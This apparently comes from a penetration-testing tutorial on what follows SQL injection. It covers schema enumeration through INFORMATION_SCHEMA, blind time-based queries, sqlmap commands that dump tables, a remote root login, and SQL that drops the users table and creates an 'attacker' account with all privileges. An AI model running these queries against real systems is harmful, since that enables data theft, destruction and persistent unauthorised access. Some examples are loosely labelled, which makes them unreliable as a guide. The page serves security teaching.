Skip to content

Database Enumeration

After initial exploitation via SQL injection, the next phase involves systematically extracting database schema details, credentials, and escalating privileges to gain deeper access. This process requires understanding the database structure, identifying misconfigurations, and leveraging user permissions to pivot to higher-privilege contexts.


Database Enumeration Techniques

Enumerating a database involves retrieving schema details (tables, columns, data types) and identifying potential credentials. Common methods include:

1. Basic Schema Enumeration

Use UNION SELECT to extract database metadata. For example:

SELECT CONCAT(TABLE_NAME, '(', COLUMN_NAME, ')') FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA = DATABASE();
This query concatenates table and column names to infer schema structure.

Example:

-- Retrieve database name  
SELECT DATABASE();  

-- Enumerate tables  
SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA = DATABASE();  

-- Enumerate columns  
SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = 'users';

2. Error-Based and Blind Enumeration

In error-based scenarios, trigger syntax errors to infer database structure:

SELECT 1 FROM users WHERE 1 = 1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100 FROM dual;
In blind SQLi, use time-based or boolean responses to infer data:
-- Time-based delay (MySQL)  
SELECT IF((SELECT COUNT(*) FROM users WHERE username = 'admin'), SLEEP(5), 0);  

3. Automated Tools

Tools like sqlmap can automate enumeration:

sqlmap -u "http://example.com/vulnerable.php?id=1" --tables  
sqlmap -u "http://example.com/vulnerable.php?id=1" --columns  
sqlmap -u "http://example.com/vulnerable.php?id=1" --dump


Privilege Escalation Strategies

Escalating privileges involves exploiting misconfigurations or leveraging user permissions to access administrative functions.

1. Identify Administrative Privileges

Check if the application user has access to system tables or administrative commands:

-- Check for administrative privileges (MySQL)  
SELECT USER(), CURRENT_USER();  

-- Check for elevated permissions  
SELECT * FROM mysql.user WHERE User = 'root';  

2. Exploit Database Misconfigurations

If the database allows remote connections, attempt to access it directly:

mysql -h 192.168.1.10 -u root -p
If credentials are found in the database, use them to access the server.

3. Leverage Application Permissions

If the application user has DROP, CREATE, or ALTER privileges, use them to modify the database:

-- Drop a table (if permitted)  
DROP TABLE users;  

-- Create a new user (MySQL)  
CREATE USER 'attacker'@'%' IDENTIFIED BY 'password';  
GRANT ALL PRIVILEGES ON *.* TO 'attacker'@'%';  

4. Exploit Stored Procedures or Functions

If the database contains malicious stored procedures, execute them to escalate privileges:

CALL exploit_procedure();  


Tools and Automation

  • sqlmap: Automates enumeration, privilege escalation, and data extraction.
  • Burp Suite: Intercept and modify requests to test blind SQLi vectors.
  • MySQL/PostgreSQL Clients: Directly access databases if credentials are exposed.

Key takeaways

  • Use UNION SELECT and INFORMATION_SCHEMA to extract database schemas.
  • Leverage error-based or blind techniques to infer schema details when responses are limited.
  • Automate enumeration with tools like sqlmap to accelerate the process.
  • Escalate privileges by exploiting misconfigurations, administrative commands, or stored procedures.
  • Always validate database dialects (MySQL, PostgreSQL, SQL Server) for syntax compatibility.